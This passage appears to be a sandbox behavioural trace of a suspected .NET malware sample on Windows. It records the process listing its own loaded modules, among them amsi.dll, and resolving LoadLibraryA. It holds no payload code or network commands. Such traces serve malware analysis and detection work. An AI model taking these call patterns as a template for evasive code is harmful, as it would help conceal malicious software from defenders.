EntryPoint=0x6c6a4160)) returned 1 [0166.449] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.449] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c650000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0166.450] CoTaskMemFree (pv=0x8b4098) [0166.450] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.450] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c650000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0166.450] CoTaskMemFree (pv=0x8b4098) [0166.450] GetModuleInformation (in: hProcess=0x2e4, hModule=0x69850000, lpmodinfo=0x231f930, cb=0xc | out: lpmodinfo=0x231f930*(lpBaseOfDll=0x69850000, SizeOfImage=0x1228000, EntryPoint=0x0)) returned 1 [0166.451] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.451] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x69850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0166.451] CoTaskMemFree (pv=0x8b4098) [0166.451] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.451] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x69850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll")) returned 0x68 [0166.452] CoTaskMemFree (pv=0x8b4098) [0166.452] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75360000, lpmodinfo=0x2321ad8, cb=0xc | out: lpmodinfo=0x2321ad8*(lpBaseOfDll=0x75360000, SizeOfImage=0xeb000, EntryPoint=0x7539d650)) returned 1 [0166.453] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.453] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75360000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0166.453] CoTaskMemFree (pv=0x8b4098) [0166.453] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.454] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75360000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0166.454] CoTaskMemFree (pv=0x8b4098) [0166.454] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6fef0000, lpmodinfo=0x2323bdc, cb=0xc | out: lpmodinfo=0x2323bdc*(lpBaseOfDll=0x6fef0000, SizeOfImage=0x75000, EntryPoint=0x6ff29a60)) returned 1 [0166.455] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.455] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6fef0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0166.455] CoTaskMemFree (pv=0x8b4098) [0166.455] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.455] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6fef0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0166.456] CoTaskMemFree (pv=0x8b4098) [0166.456] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f820000, lpmodinfo=0x2325ce8, cb=0xc | out: lpmodinfo=0x2325ce8*(lpBaseOfDll=0x6f820000, SizeOfImage=0x13000, EntryPoint=0x6f829950)) returned 1 [0166.457] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.457] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f820000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0166.457] CoTaskMemFree (pv=0x8b4098) [0166.457] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.457] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f820000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTSP.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")) returned 0x1f [0166.458] CoTaskMemFree (pv=0x8b4098) [0166.458] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f7f0000, lpmodinfo=0x2327df4, cb=0xc | out: lpmodinfo=0x2327df4*(lpBaseOfDll=0x6f7f0000, SizeOfImage=0x2f000, EntryPoint=0x6f8095e0)) returned 1 [0166.458] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.458] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0166.459] CoTaskMemFree (pv=0x8b4098) [0166.459] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.459] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")) returned 0x1e [0166.460] CoTaskMemFree (pv=0x8b4098) [0166.460] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73ae0000, lpmodinfo=0x2329f00, cb=0xc | out: lpmodinfo=0x2329f00*(lpBaseOfDll=0x73ae0000, SizeOfImage=0x1b000, EntryPoint=0x73ae9050)) returned 1 [0166.460] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.460] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73ae0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0166.461] CoTaskMemFree (pv=0x8b4098) [0166.461] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.461] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73ae0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0166.462] CoTaskMemFree (pv=0x8b4098) [0166.462] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c850000, lpmodinfo=0x232c00c, cb=0xc | out: lpmodinfo=0x232c00c*(lpBaseOfDll=0x6c850000, SizeOfImage=0x7e000, EntryPoint=0x6c851140)) returned 1 [0166.462] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.462] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0166.463] CoTaskMemFree (pv=0x8b4098) [0166.463] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.463] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0166.464] CoTaskMemFree (pv=0x8b4098) [0166.464] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75b00000, lpmodinfo=0x232e14c, cb=0xc | out: lpmodinfo=0x232e14c*(lpBaseOfDll=0x75b00000, SizeOfImage=0x92000, EntryPoint=0x75b38cf0)) returned 1 [0166.464] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.464] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75b00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0166.465] CoTaskMemFree (pv=0x8b4098) [0166.465] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.465] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75b00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0166.466] CoTaskMemFree (pv=0x8b4098) [0166.466] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6ad40000, lpmodinfo=0x2330260, cb=0xc | out: lpmodinfo=0x2330260*(lpBaseOfDll=0x6ad40000, SizeOfImage=0x9ac000, EntryPoint=0x0)) returned 1 [0166.466] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.466] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6ad40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0166.467] CoTaskMemFree (pv=0x8b4098) [0166.467] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.467] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6ad40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll")) returned 0x64 [0166.468] CoTaskMemFree (pv=0x8b4098) [0166.468] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c4c0000, lpmodinfo=0x23323fc, cb=0xc | out: lpmodinfo=0x23323fc*(lpBaseOfDll=0x6c4c0000, SizeOfImage=0x18d000, EntryPoint=0x0)) returned 1 [0166.469] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.469] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0166.470] CoTaskMemFree (pv=0x8b4098) [0166.470] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.470] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll")) returned 0x74 [0166.470] CoTaskMemFree (pv=0x8b4098) [0166.470] GetModuleInformation (in: hProcess=0x2e4, hModule=0x68bf0000, lpmodinfo=0x23346d4, cb=0xc | out: lpmodinfo=0x23346d4*(lpBaseOfDll=0x68bf0000, SizeOfImage=0xc59000, EntryPoint=0x0)) returned 1 [0166.476] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.476] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x68bf0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0166.477] CoTaskMemFree (pv=0x8b4098) [0166.477] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.477] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x68bf0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll")) returned 0x80 [0166.478] CoTaskMemFree (pv=0x8b4098) [0166.478] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c7b0000, lpmodinfo=0x23368c4, cb=0xc | out: lpmodinfo=0x23368c4*(lpBaseOfDll=0x6c7b0000, SizeOfImage=0x92000, EntryPoint=0x6c7bdd60)) returned 1 [0166.479] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.479] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0166.480] CoTaskMemFree (pv=0x8b4098) [0166.480] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.480] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0166.481] CoTaskMemFree (pv=0x8b4098) [0166.481] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f730000, lpmodinfo=0x2338a88, cb=0xc | out: lpmodinfo=0x2338a88*(lpBaseOfDll=0x6f730000, SizeOfImage=0x1d000, EntryPoint=0x6f733b10)) returned 1 [0166.483] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.483] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f730000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0166.484] CoTaskMemFree (pv=0x8b4098) [0166.485] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.485] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f730000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0166.486] CoTaskMemFree (pv=0x8b4098) [0166.487] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c3f0000, lpmodinfo=0x233ab94, cb=0xc | out: lpmodinfo=0x233ab94*(lpBaseOfDll=0x6c3f0000, SizeOfImage=0xc5000, EntryPoint=0x0)) returned 1 [0166.489] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.489] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Runtime.Remoting.ni.dll") returned 0x1e [0166.490] CoTaskMemFree (pv=0x8b4098) [0166.493] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.493] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\System.Runtime.Remoting.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\system.runtime.remoting.ni.dll")) returned 0x83 [0166.501] CoTaskMemFree (pv=0x8b4098) [0166.502] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d300000, lpmodinfo=0x233cd90, cb=0xc | out: lpmodinfo=0x233cd90*(lpBaseOfDll=0x6d300000, SizeOfImage=0xd000, EntryPoint=0x6d3063e0)) returned 1 [0166.502] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.502] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d300000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0166.504] CoTaskMemFree (pv=0x8b4098) [0166.504] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.504] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d300000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0166.505] CoTaskMemFree (pv=0x8b4098) [0166.505] GetModuleInformation (in: hProcess=0x2e4, hModule=0x684d0000, lpmodinfo=0x233ee94, cb=0xc | out: lpmodinfo=0x233ee94*(lpBaseOfDll=0x684d0000, SizeOfImage=0x712000, EntryPoint=0x0)) returned 1 [0166.507] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.507] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x684d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0166.508] CoTaskMemFree (pv=0x8b4098) [0166.508] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.508] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x684d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll")) returned 0x6e [0166.509] CoTaskMemFree (pv=0x8b4098) [0166.509] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74920000, lpmodinfo=0x2341050, cb=0xc | out: lpmodinfo=0x2341050*(lpBaseOfDll=0x74920000, SizeOfImage=0x6000, EntryPoint=0x74921460)) returned 1 [0166.510] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.510] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74920000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0166.512] CoTaskMemFree (pv=0x8b4098) [0166.512] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.512] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74920000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0166.513] CoTaskMemFree (pv=0x8b4098) [0166.514] CloseHandle (hObject=0x2e4) returned 1 [0166.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LoadLibraryA", cchWideChar=12, lpMultiByteStr=0x19cb74, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoadLibraryAMÚd", lpUsedDefaultChar=0x0) returned 12 [0166.548] GetProcAddress (hModule=0x74610000, lpProcName="LoadLibraryA") returned 0x74634bf0 [0166.580] GetCurrentProcessId () returned 0x1318 [0166.580] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1318) returned 0x2e4 [0166.580] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2343b48, cb=0x100, lpcbNeeded=0x19cb68 | out: lphModule=0x2343b48, lpcbNeeded=0x19cb68) returned 1 [0166.581] GetModuleInformation (in: hProcess=0x2e4, hModule=0x400000, lpmodinfo=0x2343c88, cb=0xc | out: lpmodinfo=0x2343c88*(lpBaseOfDll=0x400000, SizeOfImage=0x76000, EntryPoint=0x0)) returned 1 [0166.581] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.581] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned 0x44 [0166.582] CoTaskMemFree (pv=0x8b4098) [0166.582] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.582] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0166.582] CoTaskMemFree (pv=0x8b4098) [0166.582] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77110000, lpmodinfo=0x2345eac, cb=0xc | out: lpmodinfo=0x2345eac*(lpBaseOfDll=0x77110000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0166.582] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.582] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77110000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0166.582] CoTaskMemFree (pv=0x8b4098) [0166.582] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.582] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77110000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0166.583] CoTaskMemFree (pv=0x8b4098) [0166.583] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d320000, lpmodinfo=0x2347fb0, cb=0xc | out: lpmodinfo=0x2347fb0*(lpBaseOfDll=0x6d320000, SizeOfImage=0x59000, EntryPoint=0x6d330780)) returned 1 [0166.583] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.583] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d320000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0166.584] CoTaskMemFree (pv=0x8b4098) [0166.584] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.584] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d320000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0166.584] CoTaskMemFree (pv=0x8b4098) [0166.584] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74610000, lpmodinfo=0x234a0bc, cb=0xc | out: lpmodinfo=0x234a0bc*(lpBaseOfDll=0x74610000, SizeOfImage=0xe0000, EntryPoint=0x74623980)) returned 1 [0166.594] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.594] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74610000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0166.595] CoTaskMemFree (pv=0x8b4098) [0166.595] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.595] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74610000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0166.596] CoTaskMemFree (pv=0x8b4098) [0166.596] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75710000, lpmodinfo=0x234c1d0, cb=0xc | out: lpmodinfo=0x234c1d0*(lpBaseOfDll=0x75710000, SizeOfImage=0x17e000, EntryPoint=0x757c1b90)) returned 1 [0166.596] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.596] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75710000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0166.597] CoTaskMemFree (pv=0x8b4098) [0166.597] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.597] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75710000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0166.597] CoTaskMemFree (pv=0x8b4098) [0166.597] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73d90000, lpmodinfo=0x234e318, cb=0xc | out: lpmodinfo=0x234e318*(lpBaseOfDll=0x73d90000, SizeOfImage=0x92000, EntryPoint=0x73dd0380)) returned 1 [0166.598] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.598] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73d90000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0166.598] CoTaskMemFree (pv=0x8b4098) [0166.598] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.598] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73d90000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0166.599] CoTaskMemFree (pv=0x8b4098) [0166.599] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74380000, lpmodinfo=0x2350424, cb=0xc | out: lpmodinfo=0x2350424*(lpBaseOfDll=0x74380000, SizeOfImage=0x7b000, EntryPoint=0x7439e970)) returned 1 [0166.599] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.599] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74380000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0166.600] CoTaskMemFree (pv=0x8b4098) [0166.600] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.600] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74380000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0166.601] CoTaskMemFree (pv=0x8b4098) [0166.601] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75a40000, lpmodinfo=0x2352538, cb=0xc | out: lpmodinfo=0x2352538*(lpBaseOfDll=0x75a40000, SizeOfImage=0xbe000, EntryPoint=0x75a75630)) returned 1 [0166.601] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.601] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75a40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0166.602] CoTaskMemFree (pv=0x8b4098) [0166.602] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.602] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75a40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0166.603] CoTaskMemFree (pv=0x8b4098) [0166.603] GetModuleInformation (in: hProcess=0x2e4, hModule=0x758c0000, lpmodinfo=0x2354644, cb=0xc | out: lpmodinfo=0x2354644*(lpBaseOfDll=0x758c0000, SizeOfImage=0x44000, EntryPoint=0x758d9d80)) returned 1 [0166.603] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.603] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x758c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0166.604] CoTaskMemFree (pv=0x8b4098) [0166.604] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.604] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x758c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0166.605] CoTaskMemFree (pv=0x8b4098) [0166.605] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75970000, lpmodinfo=0x235679c, cb=0xc | out: lpmodinfo=0x235679c*(lpBaseOfDll=0x75970000, SizeOfImage=0xad000, EntryPoint=0x75984f00)) returned 1 [0166.605] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.605] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75970000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0166.606] CoTaskMemFree (pv=0x8b4098) [0166.606] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.606] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75970000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0166.606] CoTaskMemFree (pv=0x8b4098) [0166.606] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e40000, lpmodinfo=0x23588a8, cb=0xc | out: lpmodinfo=0x23588a8*(lpBaseOfDll=0x73e40000, SizeOfImage=0x1e000, EntryPoint=0x73e4b640)) returned 1 [0166.607] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.607] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0166.607] CoTaskMemFree (pv=0x8b4098) [0166.607] CoTaskMemAlloc (cb=0x804) returned 0x8b4098 [0166.607] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0166.608] CoTaskMemFree 